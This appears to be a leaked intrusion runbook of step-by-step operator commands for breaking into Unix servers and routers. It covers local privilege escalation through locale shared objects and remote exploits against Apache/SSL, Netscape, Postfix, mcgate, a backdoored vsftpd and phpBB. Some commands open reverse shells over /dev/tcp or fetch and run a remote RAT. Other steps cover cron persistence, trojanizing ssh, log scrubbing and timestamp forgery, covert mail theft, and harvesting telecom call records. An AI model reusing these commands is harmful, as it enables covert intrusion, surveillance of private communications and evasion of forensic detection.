-ls /usr/dt/bin/dtappgather
### Upload the proper version
-cd /tmp/.scsi
-put /current/up/exp.x.tar.Z b.tar.Z
uncompress b.tar.Z
tar -xf b.tar
### Find a setuid root program to use for the exploit
### The following should work:
### w, ps -ef, at -l, whodo, who, and ls -al
### Pick a program, determine the location, and verify setuid root is there
### (should see perms of -rwsr-xr-x)
which at
-ls /bin/at
### Verify su is NOT in the locale directory already
ls -al /usr/lib/locale/su
### Rename the shared object to have the name of 'su' or whichever loacale you u
se instead
### Be sure you use the correct version for the system's architecture
cp su.so.2.789x su.so.2
-ls -t
### Have a copy of nopen in your working directory to start up once you get root
:
-put /current/up/noserver sendmail
-ls
### Insert the local shared object /usr/lib/locale by running the following
### This will also generate itime commands to use later when cleaning up,
### normal error messages, and an indication of the success/failure of th
### insertion of the object into /usr/lib/locale
./exp su
echo "" | at now + 180 mins
### Set up your variables
-getenv
-setenv LC_TIME=su
-getenv
at -l
-shell
LC_TIME=su
export LC_TIME
at -l
id
pwd
cd /tmp/.scsi
PATH=. sendmail
exit
exit
### Connect from pitch to new noserver that has root privileges
-nstun TARGET_IP
### Burn your unprivileged nopen session and connect agin to new noserver
-burn
-nstun TARGET_IP
### Cleanup
at -l
at -r 1085530072.a
at -l
ls -al /.sh_history
-ls -t /
ls -lart /usr/lib/locale
rm /usr/lib/locale/su/*
rmdir /usr/lib/locale/su
-lt /usr/lib/locale
ls -al /usr/lib | grep locale
ls -al /var/dt/appconfig | grep appmanager
ls -al /var/dt | grep appconfig
chmod 755 /usr/lib/locale
chmod 755 /var/dt/appconfig/appmanager
chmod 755 /var/dt/appconfig
chown bin:bin /usr/lib/locale
chown root:root /var/dt/appconfig/appmanager /var/dt/appconfig
ls -al /usr/lib | grep locale
ls -al /var/dt/appconfig | grep appmanager
ls -al /var/dt | grep appconfig
-touch /usr/lib/localedef /usr/lib/locale
-w
-ls -t
id
-w
-ls
-ls -t /usr/lib/locale
-ls -t /usr/lib/locale/iso_8859_1
-ls -t /usr/lib/locale/iso_8859_1/LC_CTYPE
-touch /usr/lib/locale/iso_8859_1 /usr/lib/locale/.
touch -r /usr/lib/locale/iso_8859_1 /usr/lib/locale/.
-ls -t /usr/lib/locale
ls -al /var/dt/appconfig | grep appmanager
ls -al /var/dt | grep appconfig
-ls -t /var/dt/
-ls -t /var/dt/appconfig
touch -r /var/dt/. /var/dt/appconfig/appmanager
touch -r /var/dt/. /var/dt/appconfig/.
-ls -t /var/dt/appconfig
-ls -t /var/dt/
### Clean up directory
-ls -t
-rm sendmail empty su.so.2 b.tar exp su.so.2.789x su.so.2.6x
-ls -t
### Check crontabs and logs if you used 'at'
-ls -t /var/adm
-ls -t /var/spool/cron
-ls -t /var/spool/cron/atjobs
touch -r /var/spool/cron/crontabs /var/spool/cron/atjobs
-tail -40 /var/cron/log
### Toast and sgrep your initial exploit
#######################################
### EVENTSTART
#######################################
### might reboot box on first try; after the reboot, it should work
### if you exploited an http service (like w/ EMBERSNOUT) make sure that
### service is started upon reboot; RH9.0 doesn't restart http by default
### unless the admin changed the config
### start a cron job to call nopen in case of a reboot (if you won't be able to
reexploit)
### set the time to remove itself to the next hour (use both local and UTC time)
vi /current/down/crontab:
0,5,10,15,20,25,30,35,40,45,50,55 * * * * sh -c "D=-cPITCH_IP:PORT /tmp/.httpd-l
ock/crond"
0 1,17 * * * crontab -r
### on target:
date; date -u
-ls -t /var/log/cron
-ls -t /var/spool/cron
-cat /etc/syslog.conf
crontab -l
-put /current/down/crontab crontab
-cat crontab
crontab crontab
crontab -l
date
########################################
# TFTPD - upload image to router
########################################
########################################
# SAMPLEMAN / ROUTER TOUCH
########################################
### redir
-tunnel
l 2323 TARGET_IP 23
### Locally:
telnet 127.0.0.1 2323
# userid = <>
# passwd = <>
term length 0
sh user
sh ver
sh arp
sh ip rout
sh proc cpu
enable
# enable password = <>
sh run
sh start
sh cdp neighbo detail
sh flash all
# use the chart to figure out mem location for the next command if applicable
sh mem <address>
logout
########################################
# ENGAGENAUGHTY
########################################
# Apache and SSL exploit on Linux on Dec ALpha
# ssl must be OpenSSL 0.9.6d or earlier
Usage: ./apache-ssl-linux-alpha <-i hostname> [-t arch] [-p port] [-n <connectio
ns>] [-a 0x<address>]
-t <arch> target architecture (default is 00)
-p <port> SSL port (default is 443)
-a 0x<address> the free location found via objdump
-n <N> open N apache connections before sending the shellcode (def
ault is 20)
-m <N> maximum number of open connections (default is 50)
-v verbose mode
-c command to run (default is "ls > /tmp/ls".)Supported archit
ectures:
target archs:
00 - RedHat Linux 7.0 Apache/1.3.12 (Unix) (Red Hat/Linux) mod_ssl/2.6.6 OpenSS
L/0.9.5a
Examples: ./apache-ssl-linux-alpha -a 10 -v localhost
./apache-ssl-linux-alpha -p 1234 192.168.0.1 -n 40 -m 80
examples of commands:
1. xterm: /usr/X11R6/bin/xterm -display 555.1.2.153:0 -e /bin/sh
2. wget: First: echo -e "HTTP/1.0 200\n" > new; cat new noserver-2.6.1-i586.pc.
linux.gnu.redhat-5.0 > sendmail; nc -v -l -p 53 < sendmail
then: cd /tmp;wget http://555.1.2.153:53/sendmail; chmod +x /tmp/sendmail;PA
TH=/tmp sendmail;rm -f sendmail
3. xinetd (watch for logging): echo -e "service squid\n{\nsocket_type = stream\n
wait = no\nuser = apache\nserver = /bin/sh\n}" > /tmp/.scsi; /usr/sbin/xinetd -f
/tmp/.scsi
############################################################################
# EXPLOITRETURN
# redflag 2.0 and redhat 9.0 running PHP
# found in cgi-bin for sybil build
-scan http TARGET_IP
HTTP/1.1 200 OK
Date: Wed, 25 Feb 2004 22:02:11 GMT
Server: Apache/1.3.12 (Unix) (Black Cat/Linux) mod_ssl/2.6.4 OpenSSL/0.9.5a PHP
/4.0.0 rus/PL29.4
-tunnel
l 80 TARGET_IP
# choose 79, 5555
r 79
or
r 5555
telnet 127.0.0.1 80
GET /HTTP/1.0
telnet 127.0.0.1 80
GET /ppd/product_user/reg_edu.php HTTP/1.0
# hit return twice
#response looking for: HTTP/1.1 302 Found
# do not use option 1 or 4 since it brings inconsistent results
xp_server
# uuencoded rat
uuencode sendmail sendmail > sendmail.uu
nc -l -v -p 79 < sendmail.uu
./xp_serial -i127.0.0.1 -p80 -d"/ppd/product_user/reg_edu.php" -l PITCH_IP -n79
-t3
or
# no uuencode of rat
nc -l -v -p 5555 < sendmail
./xp_serial -i127.0.0.1 -p80 -d"/ppd/product_user/reg_edu.php" -l PITCH_IP -n555
5 -t2
# after rat upload, <ctrl><c> nc command
-nstun TARGET_IP
# will be nobody - need to elevate with ptrace or other
# need to clean the following logs
/var/log/httpd/error_log
/var/log/httpd/access_log
#####################################################
# EGGBASKET
#####################################################
# Remote exploit against the Netscape Web Server which leverages
# a buffer overflow to obtain remote access
# Netscape Enterprise/3.6 and Netscape Enterprise/3.6 SP1
# works against AIMC Netscape servers also with right versions
# Netscape-Enterprise 3.6:
# solaris 2.6(sun4m only), sun4u & sun4m solaris 2.7 - 2.9
# Netscape-Enterprise/3.6 SP1:
# sun4m solaris 2.8, sun4m & sun4u solaris 2.9
# need local to elevate such as SMOOTHY and EXTREMEPARR
# Verify version of Netscape if target did not change version string
-scan http TARGET_IP
# from redirector
-tunnel
l 80 TARGET_IP
# locally
nc 127.0.0.1 80
GET / HTTP/1.0
<return>
<return>
# on redirector
-tunnel
l 80 TARGET_IP
r RANDOM_HIGH_PORT1
# locally window1
nc -vv -l -p RANDOM_HIGH_PORT1
# Usage: xp_ns-httpd
# i7 - program counter, location we are jumping to; fp - stack location; 04 -
where our code is
Targets: <version> <architecture> i7
fp o4
Version: 01: Netscape-Enterprise/3.6/sun4u/5.8/fire115/aimc 0xff2a2a74 0xff
2e6270 0x13ab60
Version: 02: Netscape-Enterprise/3.6/sun4m/5.8/theora/aimc 0xef722a74 0xef
766270 0x13a360
Version: 03: Netscape-Enterprise/3.6/sun4m/5.8/unixtest-4/aimc 0xef6e2a74 0xef
726270 0x13a060
Version: 04: Netscape-Enterprise/3.6/sun4u/5.8/unixtest-1/aimc 0xff2a2a74 0xff
2e6270 0x13a160
Version: 05: Netscape-Enterprise/3.6/sun4u/5.8/fire121/aimc 0xff2a2a74 0xff
2e6270 0x13ab60
Version: 06: Netscape-Enterprise/3.6/sun4m/5.8/arc/aimc 0xef6e2a74 0xef
726270 0x139d60
Version: 07: Netscape-Enterprise/3.6/sun4u/5.7/baltimore/aimc 0xff2a2a74 0xff
2e6270 0x13a360
Version: 08: Netscape-Enterprise/3.6/sun4u/5.7/grandmama/aimc 0xff2a2a74 0xff
2e6270 0x13a260
Version: 09: Netscape-Enterprise/3.6/sun4m/5.7/unixtest-3/aimc 0xef722a74 0xef
766270 0x139360
Version: 10: Netscape-Enterprise/3.6/sun4m/5.6/elsa/aimc 0xef722a74 0xef
766270 0x13a060
Version: 11: Netscape-Enterprise/3.6/sun4m/5.6/gazoo/aimc 0xef722a74 0xef
766270 0x13a060
Version: 12: Netscape-Enterprise/3.6/sun4m/5.6/loneranger/aimc 0xef722a74 0xef
766270 0x139360
Version: 13: Netscape-Enterprise/3.6/sun4u/5.9/fire108/aimc 0xff2a2a74 0xff
2e6270 0x139f60
Version: 14: Netscape-Enterprise/3.6/sun4m/5.9/mack/aimc 0xef6e2a74 0xef
726270 0x139d60
Version: 15: Netscape-Enterprise/3.6/sun4u/5.9/thing/aimc 0xff2a2a74 0xff
2e6270 0x139f60
Version: 16: Netscape-Enterprise/3.6/sun4u/5.9/thing 0xff2a2a74 0xff
2e6270 0x155090
Version: 17: Netscape-Enterprise/3.6/sun4u/5.9/fire117 0xff2a2a74 0xff
2e6270 0x155090
Version: 18: Netscape-Enterprise/3.6/sun4m/5.6/loneranger 0xef722a74 0xef
766270 0x153f78
Version: 19: Netscape-Enterprise/3.6/sun4u/5.9/thing 0xff2a2a74 0xff
2e6270 0x155290
Version: 19: Netscape-Enterprise/3.6/sun4u/5.8/blade1000 0xff2a2a74 0xff
2e6270 0x155f90
Version: 20: Netscape-Enterprise/3.6sp1/sun4u/5.9/thing 0xff2a2c64 0xff
2e6750 0x155390
Version: 21: Netscape-Enterprise/3.6sp1/sun4m/5.8/theora 0xef722c64 0xef
766750 0x155390
Version: 22: Netscape-Enterprise/3.6sp1/sun4m/5.9/mack 0xef6e2c64 0xef
726750 0x155090
########################################
# Exploits a vulnerability in the Postfix mail server.
# Postfix runs on FreeBSD, Linux, Solaris, and most Unix servers.
# This exploit works for the default binary packages in SuSE 9.0-9.2, ASP Linux
9, and Debian 3.1
# must elevate to get root
# postfix 2.0.14-41 on SuSE 9.0
# postfix 2.0.19_20040312-11 on SuSE 9.1
# postfix-2.0.8-1asp on ASP Linux 9
# postfix-2.1.5 on SuSE 9.2
# postfix-2.1.5 on Debian 3.1
#
# ENTERSEED expects the DUL Encoder to be in its current directory, as well
# as write permission to that directory.
#
# In the event of a chroot'ed environment, shared libraries will not be us
uable.
# Any uploaded files (such as noserver) must be statically compiled.
#
# -tunnel
# r NETCAT_PORT
# l RANDOM TARGET_IP TARGET_PORT
#####################################################
# EMPTYBOWL
#####################################################
# vulnerability in MailCenter Gateway (mcgate) - an application that comes
# with Asia Info Message Center mailserver; buffer overflow allows a string
# passed to popen() call to be controlled by an attacker; arbitraty cmd execute
# known to work only for AIMC Version 2.9.5.1
# may get one shot only and then server will crash
# works on solaris 2.6-2.10
# test - fire115
# make sure not windows target running 3389 but unix target
-scan mail TARGET_IP
-scan 3389 TARGET_IP
# Usage: ./emptybowl.py <target-ip> <port> <cmd-string>
# --NOTE: All spaces in cmd-string will be replaced by \t's
# on redirector
-tunnel
l 3389 TARGET_ip
r LOW_PORT_1
r LOW_PORT_2
# local may be needed to elevate privileges
# DO NOT use the command below, since only have 1 shot at target
#./emptybowl.py 127.0.0.1 3389 'mkdir /tmp/.scsi ; cd /tmp/.scsi && telnet PITCH
_IP NETCAT_PORT < /dev/console | uudecode && uncompress sendmail.Z && chmod 700
sendmail && PATH=. D="-cPITCH_IP:NOPEN_PORT" sendmail;'
(sh</dev/tcp/PITCH_IP/RANDOM_HIGH_PORT1>&0 2>&0)
##### use this one
nc -l -vv -p 33333
./emptybowl.py 555.1.9.115 3389 "/usr/bin/ksh -c \"sh</dev/tcp/555.1.14.111/3333
3 >&0 2>&0\""
##### or this with doublet:
./emptybowl.py 555.1.9.115 3389 "/usr/bin/ksh -c \"cat < /dev/tcp/555.1.14.111/3
3333 | /bin/sh 2>&1 | cat > /dev/tcp/555.1.14.111/44444 2>& 1\""
# on redirector
netstat -an | grep LISTEN
# look for low ports to use for doublet that are not
# being used on the redirector (21,22,22,53,79,80,443...)
# substitute LOW_PORT_1, LOW_PORT_2 with ports decided
# from the above netstat command
doublet -O LOW_PORT_1 LOW_PORT_2
# change LOW_PORT_1, LOW_PORT_2, and PITCH_IP
./emptybowl.py 127.0.0.1 3389 "/bin/ksh -c \"cat < /dev/tcp/PITCH_IP/LOW_PORT_1
| /bin/sh 2>&1 | cat > /dev/tcp/PITCH_IP/LOW_PORT_2 2>& 1\""
#./emptybowl.py 127.0.0.1 3389 '(telnet PITCH_IP LOW_PORT_1 ; sleep 1) | /bin/sh
| telnet PITCH_IP LOW_PORT_2'
# in doublet window
unset HISTSIZE
unset HISTFILESIZE
unset HISTFILE
w
pwd
id
cd /tmp
mkdir .scsi
cd .scsi
# locally
packrat RAND_PORT
<ctrl><c> # packrat command
gedit sendmail.Z.uu
# in doublet
pwd # make sure in /tmp/.scsi
/usr/bin/uudecode; ls -latr
copy/paste gedit contents into this window
uncompress sendmail.Z
ls -l
chmod 700 sendmail
PATH=. sendmail
# from redirector
-nstun TARGET_IP
# restart mcgate
<ctrl><d> doublet window on TARGET_IP
<ctrl><d>
# close tunnels on PITCH_IP
# start a new NOPEN with 'at' to avoid inheritance of listening socket
-cd /tmp/.scsi
echo "./sendmail" | at now
# from PITCH_IP
-nstun TARGET_IP:32755
#burn this NOPEN to free up socket; from original NOPEN
# started (32754) on TARGET_IP
-burnBURN
# NOPEN 2:
# now restart mcgate in new NOPEN - use at again to prevent mcgate
# from being terminated on exit.
-cd /opt/aimc/setup
echo "./mcgate" | at now
-cd /tmp/.scsi
ps -ef | grep mcgate
# ELEVATE with extremeparr (dtappgather)
# after ELEVATE with extremeparr (dtappgather)
# and restarting noserver (sendmail), connect with
-nstun TARGET_IP:32754
-rm sendmail
# burn nopen window on TARGET_IP with id of aimc
id
-burnBURN
#
# cleanup
-lt /opt/aimc/setup/
# remove core file
-rm /opt/aimc/setup/core
# in mcgate's directory; the following will be appended to mcgate.<date>:
Fri Feb 11 16:36:49 2005: cmdopen
--- : 0 : current cmd: uapi -u -f userPassword -e **************************
******************
Fri Feb 11 16:36:49 2005: cmdopen
--- : 0 : Result: rc= -5 len=0
-get /opt/aimc/setup/mcgate.YYYYMMDD
#locally
cp /current/down/../HOSTNAME.IP/opt/aimc/setup/mcgate.YYYYMMDD /current/up/m
# remove above entries; please leave the mcgate
# start values even the one we started. For example, leave:
Fri Apr 8 16:12:28 2005: main
--- : 0 : Current server port is 3389
vi /current/up/m
# on target
-put /current/up/m m
-ls -n /opt/aimc/setup/mcgate.YYYYMMDD
cat m > /opt/aimc/setup/mcgate.YYYYMMDD
-tail /opt/aimc/setup/mcgate.YYYYMMDD
# use -touch -t command from -ls -n output to
# reset timestamp on /opt/aimc/setup/mcgate.YYYYMMDD and
# /opt/aimc/setup. For example:
-touch -t 1112992709:1112992787 /opt/aimc/setup/mcgate.YYYYMMDD
-touch -t 1112992709:1112992787 /opt/aimc/setup
-rm m
at -l
-lt /var/spool/cron /var/spool/cron/atjobs
-touch /var/spool/cron/crontabs /var/spool/cron/atjobs
-cd ..
-rm .scsi
###### PORKED VSFTP Server #################################
# check to see if can use DIZZYTACHOMETER to remove mismatched vsftpd
rpm --version
whereis vsftpd
rpm -qf /usr/sbin/vsftpd
rpm -V vsftpd-1.1.3-8
-lt /usr/lib/librpm-4.1.so /usr/lib/librpmdb-4.1.so /usr/lib/librpmio-4.1.so /us
r/lib/libpopt.so /usr/lib/libbeecrypt.so /usr/lib/libbz
2.so
# or
-lt /usr/lib/librpm-4.2.so /usr/lib/librpmdb-4.2.so /usr/lib/librpmio-4.2.so /us
r/lib/libpopt.so /usr/lib/libbeecrypt.so /usr/lib/libbz
2.so
-lt /usr/sbin/vsftpd
# normal vsftpd md5sum: 11111ecd2d3ab44015eae3592fcfaec7
# porked vsftpd md5sum: bde8b06829df05be8be4b5972a2d4a39
md5sum vsftpd
-put /current/up/it it
./it /usr/sbin/vsftpd
cp /usr/sbin/vsftpd ?
-put /current/up/vsftpd vsftpd
cp vsftpd /usr/sbin/vsftpd
# use itime results to reset vsftpd times to original settings
./it /usr/sbin/vsftpd
service vsftpd stop
service vsftpd start
######## Trigger porked vsftpd
### in local window, get nopen ready
packrat -z NETCAT_PORT
### on redirector, get nopen listener ready
-nrtun NOPEN_PORT
### on redirector, set up tunnel, use a "pork source port" from list below
-tunnel
l 21 TARGET_IP 21 SPORT
r NETCAT_PORT
### in scripted local window, send pork trigger
#Usage: ./client -t|-u timeadj sport hostname dport command
#sport: 3 51 3854 5671 8213 12634 16798 23247 35139 47923 53246 63201
#./client -t|-u [tcp/udp] timeadj sport [(valid source ports for the server are:
3, 51, 3854, 5671, 8213, 12634, 16798, 23247, 35139, 47923, 53246, 63201)] hos
tname[Host IP] dport [(port on which PORKified daemon is listening)] command"
./client -t 0 SPORT 127.0.0.1 21 "cd /tmp;mkdir -p .scsi && cd .scsi; cat < /dev
/tcp/PITCH_IP/NETCAT_PORT > sendmail.uu && uudecode sendmail.uu && chmod 755 sen
dmail && PATH=. S=1 D=\"-cPITCH_IP:NOPEN_PORT\" ./sendmail"
# 2 step troubleshooting
-tunnel
l 80 TARGET_IP
r NETCAT_PORT
nc 127.0.0.1 80
telnet 127.0.0.1 80
GET /phpBB2/ HTTP/1.0
# response should be:
# Powered by phpBB 2.0.4
# determine if viewtopic.php is vulnerable
./xp_phpbb.pl -i http://127.0.0.1:80/forum/ -t1 -c"uname -a;ls -la;w"
# response should have the output of the commands in the request:
# ...
# <br/>
cd /current/up
#locally to setup fowget to put rat on target since no uudecode
echo -e "HTTP/1.0 200\n" > new
cat new noserver > sendmail
nc -v -l -p NETCAT_PORT < sendmail
# on PITCH
-nrtun RAND_PORT
# upload and execute nopen
./xp_phpbb.pl -i http://127.0.0.1:80/forum/ -t1 -c"(mkdir /tmp/.scsi; cd /tmp/.s
csi; /usr/bin/wget http://PITCH_IP:NETCAT_PORT/sendmail
-Osendmail;chmod +x sendmail;D=-cPITCH_IP:RAND_PORT PATH=. sendmail) 2>/dev/nul
l"
# clean web access log
######### SNMPWALK
-tunnel
u 161 TARGET_IP
snmpwalk 127.0.0.1 -c COMMUNITY_STRING .system
#snmpwalk -v1 -c Ult1mate 127.0.0.1 .system
#snmpwalk -v2c -c Ult1mate 127.0.0.1 .system
#snmpwalk -v1 -c tenkap 127.0.0.1 enterprises.9.9.23.1
# Software info....
snmpwalk 555.1.2.240 -c COMMUNITY_STRING jetson .system
# Hardware info .....
snmpwalk 555.1.2.240 -c COMMUNITY_STRING jetson 47.1.1.1.1.2
# CDP neighbors
snmpwalk 555.1.2.240 -c COMMUNITY_STRING jetson enterprises.9.9.23.1
# Flash Stuff
snmpwalk 555.1.2.240 -c COMMUNITY_STRING jetson 16
snmpwalk 555.1.2.240 -c COMMUNITY_STRING jetson enterprises.9.2.10.17.1.1
# Arp Cache
snmpwalk 555.1.2.240 -c COMMUNITY_STRING jetson
ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaPhysAddress
# Route info
# not sure on this one what you want....
# gives 1500 lines on our jetson.net switches
snmpwalk 555.1.2.240 -c COMMUNITY_STRING jetson ip.ipRouteTable |wc
#####################################################
# EVOKEPROMPT
#####################################################
# In netscape/mozilla to get magic cookie:
# Tools->Cookie Manager->Manage Stored Cookies
# click on your cookie; take note of name and Information
# change name-sessionid and OWVSdif1.AMY to name and Information
# for the following command
# change callback IP
in /etc/hosts, add the dns target name to 127.0.0.1
### try connecting via netcat after any "session failed" message when redirectin
g:
unset HISTSIZE
unset HISTFILESIZE
unset HISTFILE
w
uname -a
### start a netcat with the right nopen version (don't need to uuencode with /de
v/tcp way)
### nc -l -p NETCAT_PORT < sendmail
pwd
mkdir /tmp/.scsi; cd /tmp/.scsi; pwd
ls -l /usr/bin/uudecode
/bin/cat</dev/tcp/203.234.72.4/39588>/tmp/.scsi/sendmail
chmod 700 sendmail
PATH=. sendmail
id
#####################################################
# POPPING MAIL FROM A TARGET
#####################################################
### You'll be listing the messages from within a scripted window
### You'll need to devise a way to separate the mail for multiple users (for tuc
kering)
### if you are accessing more than one account
### You might try using a separate scripted window for each user, then copyi
ng
### the scripted window to the name of the user for post-processing
### The session timeout is fairly short so have your commands ready to paste
### You have to "guess" where the newest mail is, so you might want to start
### backwards to get the most recent mail, IF that applies and the mail is
### sorted by date
### IMPORTANT!!!!!! DO NOT "QUIT" THE SESSION!!!! LET IT TIMEOUT,
### OR CLOSE THE TUNNEL TO HAVE IT DROP THE CONNECTION.
### You do not want the mail marked as "read" or anything else.
### set up tunnels on redirector:
-tunnel
l 110 TARGET_IP
#############################################################################
############ I AM ROOT!
#############################################################################
###path with NO Working directory for atjob
#-setenv PATH=:/usr/bsd:/bin:/usr/bin:/sbin:/usr/sbin:/etc:/usr/etc
-setenv PATH=/usr/bin:/bin:/usr/sbin:/sbin:/usr/local/bin
HISTFILE="" ksh
# or
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
-ls
-rm sendmail sendmail.uu
# Look for and clean (if necessary) logs
###### FORENSICS ##############
=info
df -k
-find <directory1> <directory2>
-gs survey
-ls /var/spool/cron/crontab
-strings /platform
## /platform/SUNW,SystemEngine
### See who's on, note uptime and load; verify time/timezone; see who's been on
w; date; last -80
### Change owner/group/modes...if in doubt, see what's already in "/tmp"...
-ls -t / /tmp
### core files?
-ls /core
### Root users:
-ls /var/adm/sulog
-vget /var/adm/sulog
### owner:group should be root:sys...
chown -R root:sys /tmp/.scsi; chmod -R og-rwx /tmp/.scsi; ls -al
### Baseline swap
/sbin/ps -elf; swap -l; uptime
### Enough space to upload tools? Any partitions about to fill up?
df -k
#################################
### SGREP messages
#################################
-put ../up/sgrep s
-tail /var/adm/messages
### To look first:
./s "unique string" /var/adm/messages
### To replace with a string of equal or shorter length
./s "unique string" "replacement string" /var/adm/messages
#################################
### SGREPSUB (numerous things to grep)
#################################
### Locally, create a file containing the lines you want to change from /var/adm
/messages
cd /current/down
vi sg.input
### Locally, create a 2nd file containing one or more lines of replacement strin
gs
cd /current/down
vi sg.repl
### Locally, run
sgrepsub -i sg.input -r sg.repl -c <COL_NUM> -f /var/adm/messages -s ./s
### Verify the output, then paste the generated commands in the target window
#################################
### PCLEAN (put up right one)
#################################
-put ../up/pcleanTAB sendmail
-ls
### make sure to exit all but one window (processes log upon completion)
### DO NOT RUN ANY MORE NON-BUILTIN COMMANDS or you'll HAVE TO PCLEAN AGAIN!!!!
################################################################################
######
# yyserv commands
# info - stats on collected sessions
info
# filt - reprogramming the filter rules it is running; intended to only be
# used with commands generated by genconf
filter
# copy filters one by one based on local genconf output
# file - writes out collected data to disk; file name in double quotes
# ex: "/tmp/filename"; should receive ERROR if wrong, WROTE to "/tmp/filename"
file "/tmp/.scsi/d
# in nopen window not running yyserv
-get /tmp/.scsi/d
-rm /tmp/.scsi/d
# locally
/current/etc/suctionchar.decrypt PATH/d outfile
# free - deallocates memory to store collected data; should always get OK
free
# hook - realtime snooping of existing processes
# ex: hook PID
# unho - unhooking any realtime hooked processes
# sets - set maximum bytes collected per session (MAX S =)
# setc - set maximum total bytes, across all collected sessions, used to
# store data in memory (MAX C =)
# unpa - unpatch itself from the kernel
# exit - send kill to yyserv
# when finished using yyserv manually, make sure cleaned up properly
ps -ef | grep yyserv
-lt
-rm yyserv
-cd /tmp
-rm /tmp/.scsi
######################################################
# STRIFEWORLD
######################################################
###
### IMPORTANT: make note of PID,PPID that strifeworld reports when you start it
and save it in opnotes
###
### man page:
cd /current/etc
nroff -man strifeworld.1
### make note of PID,PPID it echos back and document the command used to start
it
-lcd /current/down/mailpull/TARGET_NAME.TARGET_IP
##### or use -chili
#
-chili -s 1 -l mm-dd-yyyy /var/mail USER1
## after down, check size locally
cd /current/down/mailpull/TARGET_NAME.TARGET_IP
# look at SA mail
-tail /var/adm/sulog
-ls /var/mail/USER
grep -n -i "^Subject: " /var/mail/USER
####
## Kill off all remote nopen server processes...
####
-burn
BURN
#### Try reconnecting to make sure noserver died
###
### END File user.tool.pork.COMMON
### (see also ../etc/user.tool.pork.COMMON)
###
### BEGIN File user.tool.cursehydrant.COMMON (see also ../etc/user.tool.curseh
ydrant.COMMON)
###
################ CURSEHYDRANT #########################
############### PARSING #######################################################
############
### vi Search/Replace commands ###
### ProjectName - self explanatory
### Date field - today's date, used for output files
### Host - hostname of the box (not IP address)
### Cryptkey - encryption key (use output from below md5sum command)
md5sum /current/down/tcpdump.raw
mx
:%s/PROJECTNAME/PROJECTNAME/g
:%s/DDMonYY/DDMonYY/g
:%s/HOST/HOST/g
:%s/CRYPTKEY/CRYPTKEY/g
'x
### Save the encryption key locally:
echo CRYPTKEY > /current/down/cryptkey.cursehydrant.DDMonYY
####### Prepare files containing numbers to search for:
# if files containing the numbers to search available:
mkdir /current/down/argfiles
cd /current/down/argfiles
mz
cp /mnt/zip*/arg* /current/down/argfiles
#or
cp /mnt/zip*/PROJECTNAME/arg* /current/down/argfiles
ls -altr
######
###### survey mode:
######
### checks for IMEIs that have more than one IMSI associated with it:
### to limit amount of memory used, replace "-x" with "-X numberBytes"
export ENV_ARGS='-x -k CRYPTKEY -z "ls -1rt /share/a1338/ne_q3ic/nb/convert/outp
ut/06051[1-2]*dF*"'; ./lvmkd >T:/current/down/cdrhits.cursehydrant.HOST.DDMonYY.
enc.surveyIMEI
### generates a list of Cell IDs associated with each MSC address:
### to limit amount of memory used, replace "-y" with "-Y numberBytes"
export ENV_ARGS='-y -k CRYPTKEY -z "ls -1rt /share/a1338/ne_q3ic/nb/convert/outp
ut/06051[1-2]*dF*"'; ./lvmkd >T:/current/down/cdrhits.cursehydrant.HOST.DDMonYY.
enc.surveyMSC
######
##### when it's done running, decrypt the file (-d -c options)
######
cd /current/down
ls -latr cdr*enc*
# to decrypt individually:
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.cursehydrant.HOST.DDMonYY.enc1
-o cdrhits.cursehydrant.HOST.DDMonYY.txt1 -k CRYPTKEY -d -c
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.cursehydrant.HOST.DDMonYY.enc2
-o cdrhits.cursehydrant.HOST.DDMonYY.txt2 -k CRYPTKEY -d -c
#####
##### clean up
#####
####### HP-UX (DO NOT BURN! DO NOT BURN! DO NOT BURN!)
-gs wearcup
####### Everything else...
-rm lvmkd nfskd
-lt
-cd /tmp
-rm .scsi
-lt
w
ps -ef | sort
-lt /
##### Either -burn off or if the target is HPUX, use -exit and let -wearcup do t
he cleanup
###
### END File user.tool.cursehydrant.COMMON
### (see also ../etc/user.tool.cursehydrant.COMMON)
###
### BEGIN File user.tool.dubmoat.COMMON (see also ../etc/user.tool.dubmoat.COM
MON)
###
##########################################
# DUBMOAT
##########################################
### Verify version on target:
uname -a
which ssh
ssh -V
### Preserve timestamps:
-ls -i /usr/bin/ssh
-ls -d /usr/bin
touch -r /usr/bin/ssh /tmp/.st
touch -r /usr/bin /tmp/.sb
-lt
### Create location (utmp~) for dubmoat logging:
-ls -t /var/run
cp /var/run/utmp /var/run/utmp~
### fix permisssions so any user can write to the file:
chmod 666 /var/run/utmp~
### Download original ssh:
-get /usr/bin/ssh
### Upload dubmoat and check the version:
-put /current/up/Ssh ssh
./ssh -V
### Cat our version over original to preserve inode:
cat /tmp/ssh > /usr/bin/ssh
-ls -i /usr/bin/ssh
/usr/bin/ssh -V
file /usr/bin/ssh
### Fix timestamps:
touch -r /var/run/utmp /var/run/utmp~
touch -r /var/run/utmp /var/run
touch -r /tmp/.st /usr/bin/ssh
touch -r /tmp/.sb /usr/bin
-ls -i /usr/bin/ssh
-ls -d /usr/bin/.
### Cleanup:
-rm .st .sb ssh
############################
# DUBMOAT COLLECTION
############################
-ls /var/adm/utmp*
-get -l /var/adm/utmp~
### Upload the tool used to truncate the dubmoat collection file
### Using the first "FILE SIZE" field from the output above,
### truncate the most recent collection out of the file
-lt /var/adm/utmp~
./dmt /var/adm/utmp~ <FILESIZE>
-lt /var/adm/utmp~
-rm dmt
###
### END File user.tool.dubmoat.COMMON
### (see also ../etc/user.tool.dubmoat.COMMON)
###
### BEGIN File user.tool.cursehappy.COMMON (see also ../etc/user.tool.cursehap
py.COMMON)
###
################ CURSEHAPPY #########################
############### PARSING #######################################################
############
### vi Search/Replace commands ###
### ProjectName - self explanatory
### Date field - today's date, used for output files
### Rec type - record type correlates with ProjectName, valid values: eh, ls, ss
, wb
### Host - hostname of the box (not IP address)
### Cryptkey - encryption key (use output from below md5sum command)
md5sum /current/down/tcpdump.raw
mx
:%s/PROJECTNAME/PROJECTNAME/g
:%s/DDMonYY/DDMonYY/g
:%s/HOST/HOST/g
:%s/CRYPTKEY/CRYPTKEY/g
'x
### Save the encryption key locally:
echo CRYPTKEY > /current/down/cryptkey.cursehappy.DDMonYY
####### Prepare files containing numbers to search for:
# if files containing the numbers to search available:
mkdir /current/down/argfiles
cd /current/down/argfiles
mz
cp /mnt/zip*/arg* /current/down/argfiles
#or
cp /mnt/zip*/PROJECTNAME/arg* /current/down/argfiles
ls -altr
# isbapro1 10.5.7.51
# nothing new
-lt /u01/product_evdp/evident/data_store/collect
